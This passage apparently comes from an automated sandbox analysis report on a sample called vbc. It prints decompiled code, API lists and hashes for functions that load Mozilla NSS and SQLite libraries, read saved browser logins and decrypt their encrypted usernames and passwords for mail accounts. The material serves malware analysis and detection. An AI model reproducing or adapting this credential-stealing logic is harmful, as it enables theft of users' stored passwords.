                                                                                                                                                                        • _stricmp.MSVCRT(?,signon.signonfilename), ref: 0040CC05
                                                                                                                                                                        • strlen.MSVCRT ref: 0040CC20
                                                                                                                                                                        • strlen.MSVCRT ref: 0040CC2A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _stricmp$strlen$strncmp$atoimemset$memcpy
                                                                                                                                                                        • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                                                                                                                                        • API String ID: 736090197-593045482
                                                                                                                                                                        • Opcode ID: c049cdfae9ca141b10bbd91dfc467443bb183352d5b84e1e83dacad5e1e92eca
                                                                                                                                                                        • Instruction ID: 863115145772795da6afe78a2776049e9b2399cf567c3eb7605af69a2dd2c254
                                                                                                                                                                        • Opcode Fuzzy Hash: c049cdfae9ca141b10bbd91dfc467443bb183352d5b84e1e83dacad5e1e92eca
                                                                                                                                                                        • Instruction Fuzzy Hash: 4F71C432504209FEEB10EB61DD42BDE77A5DF50328F20426BF945B21D1EB7CAE919A4C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040FCBC Relevance: 61.4, APIs: 22, Strings: 13, Instructions: 143libraryloaderstringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040FCBC(intOrPtr* __esi, char* _a4) {
				void _v283;
				char _v284;
				void _v547;
				char _v548;
				struct HINSTANCE__* _t49;
				struct HINSTANCE__* _t50;
				struct HINSTANCE__* _t61;
				void* _t70;
				struct HINSTANCE__* _t74;
				CHAR* _t91;
				intOrPtr* _t93;
				void* _t94;
				void* _t95;
				void* _t96;

				_t93 = __esi;
				if( *((intOrPtr*)(__esi + 0x24)) != 0) {
					L16:
					return 1;
				}
				_v284 = 0;
				memset( &_v283, 0, 0x117);
				_t95 = _t94 + 0xc;
				if(_a4 == 0) {
					E0040FAA6( &_v284);
				} else {
					strcpy( &_v284, _a4);
				}
				if(_v284 == 0) {
					_t91 = "sqlite3.dll";
					_t49 = GetModuleHandleA(_t91);
					 *(_t93 + 0x24) = _t49;
					if(_t49 != 0) {
						goto L14;
					}
					_t61 = LoadLibraryA(_t91);
					goto L13;
				} else {
					_v548 = 0;
					memset( &_v547, 0, 0x104);
					strcpy( &_v548,  &_v284);
					strcat( &_v284, "\\sqlite3.dll");
					_t70 = E00406155( &_v284);
					_t96 = _t95 + 0x20;
					if(_t70 == 0) {
						strcpy( &_v284,  &_v548);
						strcat( &_v284, "\\mozsqlite3.dll");
						_t96 = _t96 + 0x10;
					}
					if(E00406155( &_v284) == 0) {
						strcpy( &_v284,  &_v548);
						strcat( &_v284, "\\nss3.dll");
					}
					_t74 = GetModuleHandleA( &_v284);
					 *(_t93 + 0x24) = _t74;
					if(_t74 != 0) {
						L14:
						_t50 =  *(_t93 + 0x24);
						if(_t50 == 0) {
							return 0;
						}
						 *_t93 = GetProcAddress(_t50, "sqlite3_open");
						 *((intOrPtr*)(_t93 + 4)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_prepare");
						 *((intOrPtr*)(_t93 + 8)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_step");
						 *((intOrPtr*)(_t93 + 0xc)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_column_text");
						 *((intOrPtr*)(_t93 + 0x10)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_column_int");
						 *((intOrPtr*)(_t93 + 0x14)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_column_int64");
						 *((intOrPtr*)(_t93 + 0x18)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_finalize");
						 *((intOrPtr*)(_t93 + 0x1c)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_close");
						 *((intOrPtr*)(_t93 + 0x20)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_exec");
						goto L16;
					} else {
						_t61 = LoadLibraryExA( &_v284, 0, 8);
						L13:
						 *(_t93 + 0x24) = _t61;
						goto L14;
					}
				}
			}

















                                                                                                                                                                        0x0040fcbc
                                                                                                                                                                        0x0040fccc
                                                                                                                                                                        0x0040fe8a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040fe8c
                                                                                                                                                                        0x0040fcdf
                                                                                                                                                                        0x0040fce5
                                                                                                                                                                        0x0040fcea
                                                                                                                                                                        0x0040fcf6
                                                                                                                                                                        0x0040fd05
                                                                                                                                                                        0x0040fcf8
                                                                                                                                                                        0x0040fcfc
                                                                                                                                                                        0x0040fd02
                                                                                                                                                                        0x0040fd10
                                                                                                                                                                        0x0040fdea
                                                                                                                                                                        0x0040fdf0
                                                                                                                                                                        0x0040fdf8
                                                                                                                                                                        0x0040fdfb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040fdfe
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040fd16
                                                                                                                                                                        0x0040fd23
                                                                                                                                                                        0x0040fd29
                                                                                                                                                                        0x0040fd3c
                                                                                                                                                                        0x0040fd4d
                                                                                                                                                                        0x0040fd59
                                                                                                                                                                        0x0040fd5e
                                                                                                                                                                        0x0040fd63
                                                                                                                                                                        0x0040fd73
                                                                                                                                                                        0x0040fd84
                                                                                                                                                                        0x0040fd89
                                                                                                                                                                        0x0040fd89
                                                                                                                                                                        0x0040fd9b
                                                                                                                                                                        0x0040fdab
                                                                                                                                                                        0x0040fdbc
                                                                                                                                                                        0x0040fdc1
                                                                                                                                                                        0x0040fdcb
                                                                                                                                                                        0x0040fdd3
                                                                                                                                                                        0x0040fdd6
                                                                                                                                                                        0x0040fe07
                                                                                                                                                                        0x0040fe07
                                                                                                                                                                        0x0040fe0c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040fe93
                                                                                                                                                                        0x0040fe28
                                                                                                                                                                        0x0040fe34
                                                                                                                                                                        0x0040fe41
                                                                                                                                                                        0x0040fe4e
                                                                                                                                                                        0x0040fe5b
                                                                                                                                                                        0x0040fe68
                                                                                                                                                                        0x0040fe75
                                                                                                                                                                        0x0040fe82
                                                                                                                                                                        0x0040fe87
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040fdd8
                                                                                                                                                                        0x0040fde2
                                                                                                                                                                        0x0040fe04
                                                                                                                                                                        0x0040fe04
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040fe04
                                                                                                                                                                        0x0040fdd6

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040FCE5
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,00000000), ref: 0040FCFC
                                                                                                                                                                        • memset.MSVCRT ref: 0040FD29
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,00000000,00000104,?,?,00000000), ref: 0040FD3C
                                                                                                                                                                        • strcat.MSVCRT(?,\sqlite3.dll,?,?,?,00000000,00000104,?,?,00000000), ref: 0040FD4D
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FD73
                                                                                                                                                                        • strcat.MSVCRT(?,\mozsqlite3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FD84
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDAB
                                                                                                                                                                        • strcat.MSVCRT(?,\nss3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDBC
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDCB
                                                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDE2
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040FDF0
                                                                                                                                                                        • LoadLibraryA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040FDFE
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040FE1E
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040FE2A
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040FE37
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040FE44
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040FE51
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040FE5E
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040FE6B
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040FE78
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0040FE85
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$strcpy$strcat$HandleLibraryLoadModulememset
                                                                                                                                                                        • String ID: \mozsqlite3.dll$\nss3.dll$\sqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                                                                                                                                        • API String ID: 2571629209-2385123308
                                                                                                                                                                        • Opcode ID: f879ae07ce377879295b5903e709fdbb1205cb1f9dca58ec31e17bd31d5cb62c
                                                                                                                                                                        • Instruction ID: c8562112cbf9eae777f2394b99ada5fc335e217e34df457794dbf1c8b1b14659
                                                                                                                                                                        • Opcode Fuzzy Hash: f879ae07ce377879295b5903e709fdbb1205cb1f9dca58ec31e17bd31d5cb62c
                                                                                                                                                                        • Instruction Fuzzy Hash: 86516371900308AECB30EFA1DD45ECB7BF8AF58704F10497BE649E2641E678E6858F58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040D003 Relevance: 52.8, APIs: 20, Strings: 10, Instructions: 287stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                        			E0040D003(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char* _a8) {
				char* _v8;
				char* _v12;
				char* _v16;
				intOrPtr _v20;
				char _v36;
				int _v40;
				char _v60;
				char _v92;
				char _v108;
				char _v132;
				char _v164;
				void _v419;
				int _v420;
				void _v675;
				int _v676;
				void _v1291;
				char _v1292;
				void _v1907;
				char _v1908;
				void _v2523;
				char _v2524;
				char _v3548;
				char _v4572;
				char _v5596;
				char _v6620;
				char _v7644;
				void _v8667;
				char _v8668;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t91;
				signed int _t92;
				signed int _t93;
				intOrPtr* _t101;
				void* _t109;
				char* _t122;
				signed int _t148;
				char* _t149;
				signed int _t150;
				signed int _t157;
				signed int _t159;
				int _t175;
				void* _t207;
				void* _t208;
				intOrPtr _t209;
				char* _t213;
				intOrPtr _t215;
				signed int _t216;
				void* _t218;
				intOrPtr _t221;
				char* _t225;
				void* _t229;
				void* _t230;
				void* _t231;

				_t207 = __edx;
				E00412360(0x21dc, __ecx);
				_t209 = _a4;
				_t221 = _t209 + 0x30;
				_v20 = _t221;
				_t91 = E0040E54C(_t221, _t209 + 0x362);
				if(_t91 == 0) {
					return _t91;
				}
				_t92 =  *(_t221 + 4);
				_t175 = 0;
				if(_t92 == 0) {
					_t93 = _t92 | 0xffffffff;
					__eflags = _t93;
				} else {
					_t93 =  *_t92(_t209);
				}
				_t235 = _t93 - _t175;
				if(_t93 != _t175) {
					L36:
					return E0040E6B4(_t221);
				} else {
					E00411C05(_t209, _t221, _t235, E00411BDA(_t235), _a8);
					E00411EB7(_t207,  &_v164, _t235);
					_t208 = E00411CB0( &_v164, "logins");
					_t236 = _t208 - _t175;
					if(_t208 == _t175) {
						L33:
						_t101 =  *((intOrPtr*)(_v20 + 8));
						if(_t101 != _t175) {
							 *_t101();
						}
						E00404638( &_v108);
						E00406B8A( &_v132);
						E00406A7D( &_v164);
						_t221 = _v20;
						goto L36;
					}
					E00411BDA(_t236);
					_t109 = E00406B3E( *((intOrPtr*)(_t208 + 4)),  *((intOrPtr*)(_t208 + 8)));
					_t237 = _t109 - _t175;
					if(_t109 == _t175) {
						_t109 = 0x41344f;
					}
					_v40 = _t175;
					E00406CFF( &_v60, _t109);
					while(E00411EB7(_t208,  &_v92, _t237) != 0) {
						_v8668 = _t175;
						memset( &_v8667, _t175, 0x3ff);
						memset( &_v7644, _t175, 0x1400);
						_t231 = _t230 + 0x18;
						_t212 =  &_v92;
						_t225 = E00411C8A( &_v92, "hostname");
						_v16 = E00411C8A( &_v92, "encryptedUsername");
						_a8 = E00411C8A( &_v92, "encryptedPassword");
						_v12 = E00411C8A( &_v92, "usernameField");
						_v8 = E00411C8A(_t212, "passwordField");
						_t122 = E00411C8A(_t212, "httpRealm");
						__eflags = _t225 - _t175;
						_t213 = _t122;
						if(_t225 != _t175) {
							strcpy( &_v8668, _t225);
						}
						__eflags = _v16 - _t175;
						if(_v16 != _t175) {
							strcpy( &_v7644, _v16);
						}
						__eflags = _a8 - _t175;
						if(_a8 != _t175) {
							strcpy( &_v6620, _a8);
						}
						__eflags = _v12 - _t175;
						if(_v12 != _t175) {
							strcpy( &_v5596, _v12);
						}
						__eflags = _v8 - _t175;
						if(_v8 != _t175) {
							strcpy( &_v4572, _v8);
						}
						__eflags = _t213 - _t175;
						if(_t213 != _t175) {
							strcpy( &_v3548, _t213);
						}
						_v676 = _t175;
						memset( &_v675, _t175, 0xff);
						_v420 = _t175;
						memset( &_v419, _t175, 0xff);
						_t215 = _a4;
						_t230 = _t231 + 0x18;
						E0040CF02(_a8, _t215,  &_v420);
						E0040CF02(_v16, _t215,  &_v676);
						__eflags =  *((intOrPtr*)(_t215 + 0x474)) - _t175;
						_a8 = _t175;
						if(__eflags > 0) {
							_t216 = _t215 + 0x468;
							__eflags = _t216;
							_v8 = _t216;
							do {
								_t229 = E0040DA96(_a8, _v8);
								_v1292 = _t175;
								memset( &_v1291, _t175, 0x261);
								_v2524 = _t175;
								memset( &_v2523, _t175, 0x261);
								_v1908 = _t175;
								memset( &_v1907, _t175, 0x261);
								_t56 = _t229 + 0x104; // 0x104
								_t218 = _t56;
								sprintf( &_v1292, "mailbox://%s", _t218);
								sprintf( &_v2524, "imap://%s", _t218);
								sprintf( &_v1908, "smtp://%s", _t218);
								_t230 = _t230 + 0x48;
								_push( &_v3548);
								_t148 =  &_v1292;
								_push(_t148);
								L00412072();
								__eflags = _t148;
								if(_t148 == 0) {
									L26:
									_t66 = _t229 + 0x204; // 0x204
									_t149 = _t66;
									_push(_t149);
									_v12 = _t149;
									_t150 =  &_v676;
									_push(_t150);
									L00412072();
									__eflags = _t150;
									if(_t150 == 0) {
										__eflags = _v420 - _t175;
										if(_v420 != _t175) {
											_t71 = _t229 + 0x304; // 0x304
											E004060DA(0xff, _t71,  &_v420);
										}
										E004060DA(0xff, _v12,  &_v676);
										_t175 = 0;
										__eflags = 0;
									}
									goto L30;
								}
								_push( &_v3548);
								_t157 =  &_v2524;
								_push(_t157);
								L00412072();
								__eflags = _t157;
								if(_t157 == 0) {
									goto L26;
								}
								_push( &_v3548);
								_t159 =  &_v1908;
								_push(_t159);
								L00412072();
								__eflags = _t159;
								if(_t159 != 0) {
									goto L30;
								}
								goto L26;
								L30:
								_a8 =  &(_a8[1]);
								__eflags = _a8 -  *((intOrPtr*)(_a4 + 0x474));
							} while (__eflags < 0);
						}
					}
					E00404638( &_v36);
					E00406B8A( &_v60);
					E00406A7D( &_v92);
					goto L33;
				}
			}


























































                                                                                                                                                                        0x0040d003
                                                                                                                                                                        0x0040d00b
                                                                                                                                                                        0x0040d013
                                                                                                                                                                        0x0040d01c
                                                                                                                                                                        0x0040d020
                                                                                                                                                                        0x0040d023
                                                                                                                                                                        0x0040d02a
                                                                                                                                                                        0x0040d3b2
                                                                                                                                                                        0x0040d3b2
                                                                                                                                                                        0x0040d030
                                                                                                                                                                        0x0040d033
                                                                                                                                                                        0x0040d037
                                                                                                                                                                        0x0040d045
                                                                                                                                                                        0x0040d045
                                                                                                                                                                        0x0040d039
                                                                                                                                                                        0x0040d040
                                                                                                                                                                        0x0040d042
                                                                                                                                                                        0x0040d048
                                                                                                                                                                        0x0040d04a
                                                                                                                                                                        0x0040d3a9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d050
                                                                                                                                                                        0x0040d05f
                                                                                                                                                                        0x0040d06a
                                                                                                                                                                        0x0040d079
                                                                                                                                                                        0x0040d07b
                                                                                                                                                                        0x0040d07d
                                                                                                                                                                        0x0040d37f
                                                                                                                                                                        0x0040d382
                                                                                                                                                                        0x0040d387
                                                                                                                                                                        0x0040d389
                                                                                                                                                                        0x0040d389
                                                                                                                                                                        0x0040d38e
                                                                                                                                                                        0x0040d396
                                                                                                                                                                        0x0040d3a1
                                                                                                                                                                        0x0040d3a6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d3a6
                                                                                                                                                                        0x0040d086
                                                                                                                                                                        0x0040d091
                                                                                                                                                                        0x0040d096
                                                                                                                                                                        0x0040d098
                                                                                                                                                                        0x0040d09a
                                                                                                                                                                        0x0040d09a
                                                                                                                                                                        0x0040d0a4
                                                                                                                                                                        0x0040d0a7
                                                                                                                                                                        0x0040d358
                                                                                                                                                                        0x0040d0be
                                                                                                                                                                        0x0040d0c4
                                                                                                                                                                        0x0040d0d6
                                                                                                                                                                        0x0040d0db
                                                                                                                                                                        0x0040d0e3
                                                                                                                                                                        0x0040d0f0
                                                                                                                                                                        0x0040d0fc
                                                                                                                                                                        0x0040d109
                                                                                                                                                                        0x0040d116
                                                                                                                                                                        0x0040d123
                                                                                                                                                                        0x0040d126
                                                                                                                                                                        0x0040d12b
                                                                                                                                                                        0x0040d12d
                                                                                                                                                                        0x0040d12f
                                                                                                                                                                        0x0040d139
                                                                                                                                                                        0x0040d13f
                                                                                                                                                                        0x0040d140
                                                                                                                                                                        0x0040d143
                                                                                                                                                                        0x0040d14f
                                                                                                                                                                        0x0040d155
                                                                                                                                                                        0x0040d156
                                                                                                                                                                        0x0040d159
                                                                                                                                                                        0x0040d165
                                                                                                                                                                        0x0040d16b
                                                                                                                                                                        0x0040d16c
                                                                                                                                                                        0x0040d16f
                                                                                                                                                                        0x0040d17b
                                                                                                                                                                        0x0040d181
                                                                                                                                                                        0x0040d182
                                                                                                                                                                        0x0040d185
                                                                                                                                                                        0x0040d191
                                                                                                                                                                        0x0040d197
                                                                                                                                                                        0x0040d198
                                                                                                                                                                        0x0040d19a
                                                                                                                                                                        0x0040d1a4
                                                                                                                                                                        0x0040d1aa
                                                                                                                                                                        0x0040d1b9
                                                                                                                                                                        0x0040d1bf
                                                                                                                                                                        0x0040d1cd
                                                                                                                                                                        0x0040d1d3
                                                                                                                                                                        0x0040d1d8
                                                                                                                                                                        0x0040d1db
                                                                                                                                                                        0x0040d1ea
                                                                                                                                                                        0x0040d1fb
                                                                                                                                                                        0x0040d200
                                                                                                                                                                        0x0040d206
                                                                                                                                                                        0x0040d209
                                                                                                                                                                        0x0040d20f
                                                                                                                                                                        0x0040d20f
                                                                                                                                                                        0x0040d215
                                                                                                                                                                        0x0040d218
                                                                                                                                                                        0x0040d229
                                                                                                                                                                        0x0040d233
                                                                                                                                                                        0x0040d239
                                                                                                                                                                        0x0040d247
                                                                                                                                                                        0x0040d24d
                                                                                                                                                                        0x0040d25b
                                                                                                                                                                        0x0040d261
                                                                                                                                                                        0x0040d266
                                                                                                                                                                        0x0040d266
                                                                                                                                                                        0x0040d279
                                                                                                                                                                        0x0040d28b
                                                                                                                                                                        0x0040d29d
                                                                                                                                                                        0x0040d2a2
                                                                                                                                                                        0x0040d2ab
                                                                                                                                                                        0x0040d2ac
                                                                                                                                                                        0x0040d2b2
                                                                                                                                                                        0x0040d2b3
                                                                                                                                                                        0x0040d2b8
                                                                                                                                                                        0x0040d2bc
                                                                                                                                                                        0x0040d2f0
                                                                                                                                                                        0x0040d2f0
                                                                                                                                                                        0x0040d2f0
                                                                                                                                                                        0x0040d2f6
                                                                                                                                                                        0x0040d2f7
                                                                                                                                                                        0x0040d2fa
                                                                                                                                                                        0x0040d300
                                                                                                                                                                        0x0040d301
                                                                                                                                                                        0x0040d306
                                                                                                                                                                        0x0040d30a
                                                                                                                                                                        0x0040d30c
                                                                                                                                                                        0x0040d312
                                                                                                                                                                        0x0040d31b
                                                                                                                                                                        0x0040d326
                                                                                                                                                                        0x0040d32b
                                                                                                                                                                        0x0040d33b
                                                                                                                                                                        0x0040d341
                                                                                                                                                                        0x0040d341
                                                                                                                                                                        0x0040d341
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d30a
                                                                                                                                                                        0x0040d2c4
                                                                                                                                                                        0x0040d2c5
                                                                                                                                                                        0x0040d2cb
                                                                                                                                                                        0x0040d2cc
                                                                                                                                                                        0x0040d2d1
                                                                                                                                                                        0x0040d2d5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d2dd
                                                                                                                                                                        0x0040d2de
                                                                                                                                                                        0x0040d2e4
                                                                                                                                                                        0x0040d2e5
                                                                                                                                                                        0x0040d2ea
                                                                                                                                                                        0x0040d2ee
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d343
                                                                                                                                                                        0x0040d343
                                                                                                                                                                        0x0040d34c
                                                                                                                                                                        0x0040d34c
                                                                                                                                                                        0x0040d218
                                                                                                                                                                        0x0040d209
                                                                                                                                                                        0x0040d36b
                                                                                                                                                                        0x0040d373
                                                                                                                                                                        0x0040d37a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d37a

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E56D
                                                                                                                                                                          • Part of subcall function 0040E54C: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040E59C
                                                                                                                                                                          • Part of subcall function 0040E54C: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040E5A9
                                                                                                                                                                          • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E5C0
                                                                                                                                                                          • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5CA
                                                                                                                                                                          • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5D8
                                                                                                                                                                          • Part of subcall function 0040E54C: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E611
                                                                                                                                                                          • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E62D
                                                                                                                                                                          • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E645
                                                                                                                                                                          • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040E65A
                                                                                                                                                                          • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E666
                                                                                                                                                                          • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E672
                                                                                                                                                                          • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E67E
                                                                                                                                                                          • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E68A
                                                                                                                                                                          • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E696
                                                                                                                                                                        • memset.MSVCRT ref: 0040D0C4
                                                                                                                                                                        • memset.MSVCRT ref: 0040D0D6
                                                                                                                                                                        • strcpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D139
                                                                                                                                                                        • strcpy.MSVCRT(?,0040D972,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D14F
                                                                                                                                                                        • strcpy.MSVCRT(?,0040D972,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D165
                                                                                                                                                                        • strcpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D17B
                                                                                                                                                                        • strcpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D191
                                                                                                                                                                        • strcpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D1A4
                                                                                                                                                                        • memset.MSVCRT ref: 0040D1BF
                                                                                                                                                                        • memset.MSVCRT ref: 0040D1D3
                                                                                                                                                                        • memset.MSVCRT ref: 0040D239
                                                                                                                                                                        • memset.MSVCRT ref: 0040D24D
                                                                                                                                                                        • memset.MSVCRT ref: 0040D261
                                                                                                                                                                        • sprintf.MSVCRT ref: 0040D279
                                                                                                                                                                        • sprintf.MSVCRT ref: 0040D28B
                                                                                                                                                                        • sprintf.MSVCRT ref: 0040D29D
                                                                                                                                                                        • _stricmp.MSVCRT(?,?), ref: 0040D2B3
                                                                                                                                                                        • _stricmp.MSVCRT(?,?), ref: 0040D2CC
                                                                                                                                                                        • _stricmp.MSVCRT(?,?), ref: 0040D2E5
                                                                                                                                                                        • _stricmp.MSVCRT(?,00000204), ref: 0040D301
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$AddressProcstrcpy$_stricmp$sprintf$CurrentDirectoryLibraryLoadstrlen$HandleModule
                                                                                                                                                                        • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                        • API String ID: 1176642800-3943159138
                                                                                                                                                                        • Opcode ID: 07b75e6ccac2d73e9a819f79207db565455b9c3375c3b4e8148ba61c4ba1c0b5
                                                                                                                                                                        • Instruction ID: cce80d09e33f880f425c5e7640b59ca7d1e8d6c5df6cdb4a6b0c5a683426509d
                                                                                                                                                                        • Opcode Fuzzy Hash: 07b75e6ccac2d73e9a819f79207db565455b9c3375c3b4e8148ba61c4ba1c0b5
                                                                                                                                                                        • Instruction Fuzzy Hash: CDA15372D00119AEDB20EBA5CD819DE77BCAF44308F1405ABF608F7141DA3CAA85CB58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040D3B5 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 339stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                        			E0040D3B5(void* __ecx, void* __eflags, intOrPtr _a4, char* _a8) {
				char* _v8;
				int _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				intOrPtr _v28;
				int _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				char _v72;
				void _v331;
				int _v332;
				void _v587;
				int _v588;
				void _v851;
				char _v852;
				void _v1378;
				short _v1380;
				void _v1995;
				char _v1996;
				void _v2611;
				char _v2612;
				void _v3227;
				char _v3228;
				char _v4252;
				char _v5276;
				char _v6300;
				char _v7324;
				char _v8348;
				void _v9371;
				char _v9372;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t115;
				void* _t116;
				signed int _t117;
				signed int _t118;
				intOrPtr* _t122;
				void* _t133;
				char* _t179;
				int* _t180;
				char* _t187;
				char* _t189;
				int _t208;
				char* _t246;
				void* _t247;
				intOrPtr _t250;
				char* _t254;
				intOrPtr _t256;
				void* _t258;
				void* _t260;
				void* _t261;
				void* _t262;

				E00412360(0x249c, __ecx);
				_t115 = _a4;
				_t245 = _t115 + 0x362;
				_t250 = _t115 + 0x30;
